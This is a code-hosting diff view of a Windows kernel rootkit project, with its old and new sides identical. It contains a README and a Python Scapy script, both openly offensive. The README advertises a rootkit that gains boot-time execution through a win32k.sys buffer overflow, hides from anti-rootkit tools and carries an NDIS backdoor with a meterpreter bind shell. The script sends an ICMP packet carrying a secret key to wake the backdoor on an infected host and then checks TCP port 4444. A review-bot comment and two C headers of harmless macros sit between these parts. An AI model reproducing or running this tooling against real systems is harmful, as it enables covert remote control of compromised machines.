Showing
45 changed files
with
8,992 additions
and
8,992 deletions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
@@ -1,30 +1,30 @@ | ||
|
||
****************************************************************************** | ||
|
||
Kernel rootkit, that lives inside the Windows registry value data. | ||
By Oleksiuk Dmytro (aka Cr4sh) | ||
|
||
http://twitter.com/d_olex | ||
http://blog.cr4.sh | ||
cr4sh0@gmail.com | ||
|
||
****************************************************************************** | ||
|
||
Rootkit uses the zero day vulnerability in win32k.sys (buffer overflow in function win32k!bInitializeEUDC()) to get the execution at the OS startup. | ||
|
||
Features: | ||
|
||
* NDIS-based network backdoor (+ meterpreter/bind_tcp). | ||
|
||
* In order to avoid unknown executable code detection it moves itself in the memory over discardable sections of some default Windows drivers. | ||
|
||
* Completely undetectable by public anti-rootkit tools. | ||
|
||
* Working on Windows 7 (SP0, SP1) x86. | ||
|
||
|
||
![foo](http://dl.dropbox.com/u/22903093/WindowsRegistryRootkit-execution.png) | ||
|
||
|
||
This rootkit was originally presented at the ZeroNights 2012 conference during my talk. | ||
See the slides and videos for more information: http://dl.dropbox.com/u/22903093/Applied-anti-forensics.pdf | ||
|
||
****************************************************************************** | ||
|
||
Kernel rootkit, that lives inside the Windows registry value data. | ||
By Oleksiuk Dmytro (aka Cr4sh) | ||
|
||
http://twitter.com/d_olex | ||
http://blog.cr4.sh | ||
cr4sh0@gmail.com | ||
|
||
****************************************************************************** | ||
|
||
Rootkit uses the zero day vulnerability in win32k.sys (buffer overflow in function win32k!bInitializeEUDC()) to get the execution at the OS startup. | ||
|
||
Features: | ||
|
||
* NDIS-based network backdoor (+ meterpreter/bind_tcp). | ||
|
||
* In order to avoid unknown executable code detection it moves itself in the memory over discardable sections of some default Windows drivers. | ||
|
||
* Completely undetectable by public anti-rootkit tools. | ||
|
||
* Working on Windows 7 (SP0, SP1) x86. | ||
|
||
|
||
![foo](http://dl.dropbox.com/u/22903093/WindowsRegistryRootkit-execution.png) | ||
|
||
|
||
This rootkit was originally presented at the ZeroNights 2012 conference during my talk. | ||
See the slides and videos for more information: http://dl.dropbox.com/u/22903093/Applied-anti-forensics.pdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
@@ -1,88 +1,88 @@ | ||
##################################################################### | ||
# | ||
# Windows kernrel rootkit PoC using registry values processing BoF. | ||
# | ||
# Script for meterpreter/bind_tcp backdoor activation on TCP/4444 | ||
# port of infected target. | ||
# | ||
# (c) 2012, Oleksiuk Dmytro (aka Cr4sh) | ||
# cr4sh@riseup.net | ||
# | ||
##################################################################### | ||
|
||
import sys, os | ||
from optparse import OptionParser | ||
|
||
BACKDOOR_PORT_NUMBER = 4444 | ||
TIMEOUT = 5 | ||
|
||
try: | ||
|
||
# import scapy stuff | ||
from scapy.all import * | ||
|
||
except Exception, why: | ||
|
||
print "[!] Exception while importing module: " + str(why) | ||
print "[!] Scapy (http://www.secdev.org/projects/scapy/) is not installed?" | ||
sys.exit() | ||
|
||
if __name__ == '__main__': | ||
|
||
print "***********************************************************\n" | ||
print " Windows kernrel rootkit PoC using registry values processing BoF.\n" | ||
print " (c) 2012 Oleksiuk Dmytro (aka Cr4sh)" | ||
print " cr4sh@riseup.net\n" | ||
print "***********************************************************\n" | ||
|
||
parser = OptionParser() | ||
|
||
parser.add_option("-k", "--key", dest = "key", default = None, | ||
help = "Rootkit secret key.") | ||
|
||
parser.add_option("-d", "--dst", dest = "dst", default = None, | ||
help = "Destination host IP address.") | ||
|
||
# parse command line | ||
(options, args) = parser.parse_args() | ||
|
||
if options.key is None or options.dst is None: | ||
|
||
print "[!] Please specify --dst and --key options" | ||
sys.exit() | ||
|
||
print "[+] Destination host IP address: ", options.dst | ||
print "[+] Rootkit secret key: ", options.key | ||
print "[+] Backdoor port: ", str(BACKDOOR_PORT_NUMBER) | ||
|
||
# allocate IP + ICMP packets | ||
ip = IP(dst = options.dst) | ||
icmp = ICMP(type = 8, code = 0) | ||
data = "RKCTL:" + options.key | ||
|
||
# send it over the network | ||
sr1(ip/icmp/data, timeout = TIMEOUT) | ||
|
||
# scan for opened backdoor port | ||
ip = IP(dst = options.dst) | ||
TCP_SYN = TCP(sport = RandShort(), dport = int(BACKDOOR_PORT_NUMBER), flags = 'S', seq = 40) | ||
|
||
# send SYN packet and wait for the first reply | ||
TCP_SYNACK = sr1(ip/TCP_SYN, timeout = 1) | ||
|
||
# SEQ Number for SYN-ACK | ||
if not TCP_SYNACK or TCP_SYNACK.getlayer(TCP).flags != 0x12: | ||
|
||
# response from our target aka hostip - expect RST | ||
print "[+] Port %d is closed" % BACKDOOR_PORT_NUMBER | ||
|
||
else: | ||
|
||
print "[+] Port %d is opened, use Metasploit for connection to meterpreter/bind_tcp" % BACKDOOR_PORT_NUMBER | ||
print "[+] It will be closed immediately after 'exit' command in meterpreter shell" | ||
|
||
# if end | ||
|
||
# | ||
# EoF | ||
# | ||
##################################################################### | ||
# | ||
# Windows kernrel rootkit PoC using registry values processing BoF. | ||
# | ||
# Script for meterpreter/bind_tcp backdoor activation on TCP/4444 | ||
# port of infected target. | ||
# | ||
# (c) 2012, Oleksiuk Dmytro (aka Cr4sh) | ||
# cr4sh@riseup.net | ||
# | ||
##################################################################### | ||
|
||
import sys, os | ||
from optparse import OptionParser | ||
|
||
BACKDOOR_PORT_NUMBER = 4444 | ||
TIMEOUT = 5 | ||
|
||
try: | ||
|
||
# import scapy stuff | ||
from scapy.all import * | ||
|
||
except Exception, why: | ||
|
||
print "[!] Exception while importing module: " + str(why) | ||
print "[!] Scapy (http://www.secdev.org/projects/scapy/) is not installed?" | ||
sys.exit() | ||
|
||
if __name__ == '__main__': | ||
|
||
print "***********************************************************\n" | ||
print " Windows kernrel rootkit PoC using registry values processing BoF.\n" | ||
print " (c) 2012 Oleksiuk Dmytro (aka Cr4sh)" | ||
print " cr4sh@riseup.net\n" | ||
print "***********************************************************\n" | ||
|
||
parser = OptionParser() | ||
|
||
parser.add_option("-k", "--key", dest = "key", default = None, | ||
help = "Rootkit secret key.") | ||
|
||
parser.add_option("-d", "--dst", dest = "dst", default = None, | ||
help = "Destination host IP address.") | ||
|
||
# parse command line | ||
(options, args) = parser.parse_args() | ||
|
||
if options.key is None or options.dst is None: | ||
|
||
print "[!] Please specify --dst and --key options" | ||
sys.exit() | ||
|
||
print "[+] Destination host IP address: ", options.dst | ||
print "[+] Rootkit secret key: ", options.key | ||
print "[+] Backdoor port: ", str(BACKDOOR_PORT_NUMBER) | ||
|
||
# allocate IP + ICMP packets | ||
ip = IP(dst = options.dst) | ||
icmp = ICMP(type = 8, code = 0) | ||
data = "RKCTL:" + options.key | ||
|
||
# send it over the network | ||
sr1(ip/icmp/data, timeout = TIMEOUT) | ||
|
||
# scan for opened backdoor port | ||
ip = IP(dst = options.dst) | ||
TCP_SYN = TCP(sport = RandShort(), dport = int(BACKDOOR_PORT_NUMBER), flags = 'S', seq = 40) | ||
|
||
# send SYN packet and wait for the first reply | ||
TCP_SYNACK = sr1(ip/TCP_SYN, timeout = 1) | ||
|
||
# SEQ Number for SYN-ACK | ||
if not TCP_SYNACK or TCP_SYNACK.getlayer(TCP).flags != 0x12: | ||
|
||
# response from our target aka hostip - expect RST | ||
print "[+] Port %d is closed" % BACKDOOR_PORT_NUMBER | ||
|
||
else: | ||
|
||
print "[+] Port %d is opened, use Metasploit for connection to meterpreter/bind_tcp" % BACKDOOR_PORT_NUMBER | ||
print "[+] It will be closed immediately after 'exit' command in meterpreter shell" | ||
|
||
# if end | ||
|
||
# | ||
# EoF | ||
# |
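Review bot: The new side of this hunk is indistinguishable from the old side in the rendered text — every line of the script is printed twice with identical content, and the diffstat (8,992 additions against 8,992 deletions across 45 files) suggests the same holds for the whole commit, so whatever changed is in bytes the renderer does not show (line endings, encoding or BOM, or invisible characters). The forge attaches its bidirectional-Unicode warning to this file section and equally to the README and the two C header sections, which is unusual for a plain Python 2 script and ASCII C macros, though the warning alone does not establish what was inserted. Before accepting this as a whitespace-only normalization, confirm it with a byte-level view (`git diff --word-diff-regex=.` or `git show | cat -A`) and check that no bidirectional control characters were introduced. If it is a line-ending normalization, a `.gitattributes` entry such as `* text=auto` would document the intent and keep the churn from recurring.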
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
@@ -1,9 +1,9 @@ | ||
#define CATCHY_ERROR 0xffffffff | ||
|
||
#ifdef __cplusplus | ||
extern "C" { | ||
#endif | ||
ULONG __cdecl c_Catchy(PVOID); | ||
#ifdef __cplusplus | ||
} | ||
#endif | ||
#define CATCHY_ERROR 0xffffffff | ||
|
||
#ifdef __cplusplus | ||
extern "C" { | ||
#endif | ||
ULONG __cdecl c_Catchy(PVOID); | ||
#ifdef __cplusplus | ||
} | ||
#endif |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
@@ -1,33 +1,33 @@ | ||
|
||
#define TIME_ABSOLUTE(wait) (wait) | ||
#define TIME_RELATIVE(wait) (-(wait)) | ||
#define TIME_NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L) | ||
#define TIME_MICROSECONDS(micros) (((signed __int64)(micros)) * TIME_NANOSECONDS(1000L)) | ||
#define TIME_MILLISECONDS(milli) (((signed __int64)(milli)) * TIME_MICROSECONDS(1000L)) | ||
#define TIME_SECONDS(seconds) (((signed __int64)(seconds)) * TIME_MILLISECONDS(1000L)) | ||
|
||
#define RVATOVA(_base_, _offset_) ((PUCHAR)(_base_) + (ULONG)(_offset_)) | ||
|
||
#define MY_ALIGN_DOWN(_val_, _align_) ((_val_) &~ ((_align_) - 1)) | ||
#define MY_ALIGN_UP(_val_, _align_) (((_val_) & ((_align_) - 1)) ? MY_ALIGN_DOWN((_val_), (_align_)) + (_align_) : (_val_)) | ||
|
||
#define IFMT32 "0x%.8x" | ||
#define IFMT64 "0x%.16I64x" | ||
|
||
|
||
#define GET_NATIVE(_name_) \ | ||
\ | ||
func_##_name_ f_##_name_ = (func_##_name_)GetProcAddress( \ | ||
GetModuleHandle("ntdll.dll"), \ | ||
(#_name_) \ | ||
); | ||
|
||
#if defined(_X86_) | ||
|
||
#define IFMT IFMT32 | ||
|
||
#elif defined(_AMD64_) | ||
|
||
#define IFMT IFMT64 | ||
|
||
#endif | ||
|
||
#define TIME_ABSOLUTE(wait) (wait) | ||
#define TIME_RELATIVE(wait) (-(wait)) | ||
#define TIME_NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L) | ||
#define TIME_MICROSECONDS(micros) (((signed __int64)(micros)) * TIME_NANOSECONDS(1000L)) | ||
#define TIME_MILLISECONDS(milli) (((signed __int64)(milli)) * TIME_MICROSECONDS(1000L)) | ||
#define TIME_SECONDS(seconds) (((signed __int64)(seconds)) * TIME_MILLISECONDS(1000L)) | ||
|
||
#define RVATOVA(_base_, _offset_) ((PUCHAR)(_base_) + (ULONG)(_offset_)) | ||
|
||
#define MY_ALIGN_DOWN(_val_, _align_) ((_val_) &~ ((_align_) - 1)) | ||
#define MY_ALIGN_UP(_val_, _align_) (((_val_) & ((_align_) - 1)) ? MY_ALIGN_DOWN((_val_), (_align_)) + (_align_) : (_val_)) | ||
|
||
#define IFMT32 "0x%.8x" | ||
#define IFMT64 "0x%.16I64x" | ||
|
||
|
||
#define GET_NATIVE(_name_) \ | ||
\ | ||
func_##_name_ f_##_name_ = (func_##_name_)GetProcAddress( \ | ||
GetModuleHandle("ntdll.dll"), \ | ||
(#_name_) \ | ||
); | ||
|
||
#if defined(_X86_) | ||
|
||
#define IFMT IFMT32 | ||
|
||
#elif defined(_AMD64_) | ||
|
||
#define IFMT IFMT64 | ||
|
||
#endif |